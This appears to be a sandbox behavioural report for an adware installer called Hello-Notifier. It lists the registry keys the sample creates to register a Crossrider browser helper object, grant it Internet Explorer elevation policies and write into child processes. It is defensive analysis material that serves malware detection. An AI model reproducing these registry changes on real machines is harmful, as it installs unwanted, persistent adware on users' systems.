Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{65021441-ED41-4725-8921-AF5CACAE92F6}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\Policy = "3" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Approved Extensions C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\AppName = "Hello-Notifier-enabler.exe-codedownloader.exe" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\ = "CrossriderApp0037928.Sandbox" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CLSID\ = "{22222222-2222-2222-2222-220322792228}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Hello-Notifier" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55555555-5555-5555-5555-550355795528} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\ = "CrossriderApp0037928.Sandbox" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ = "Hello-Notifier" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\ = "CrossriderApp0037928.Sandbox" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\VersionIndependentProgID\ = "CrossriderApp0037928.Sandbox" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID\ = "{11111111-1111-1111-1111-110311791128}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID\ = "{11111111-1111-1111-1111-110311791128}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55555555-5555-5555-5555-550355795528}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID\ = "{11111111-1111-1111-1111-110311791128}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\ = "CrossriderApp0037928" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID\ = "CrossriderApp0037928.Sandbox.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID\ = "CrossriderApp0037928.BHO.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID\ = "{11111111-1111-1111-1111-110311791128}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\ = "ICrossriderBHO" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win64\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2904 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
PID 2904 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
PID 2904 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
PID 2904 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 2116 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2116 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4032 wrote to memory of 4040 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 2116 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 2116 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 2116 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 2116 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 700 wrote to memory of 2948 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
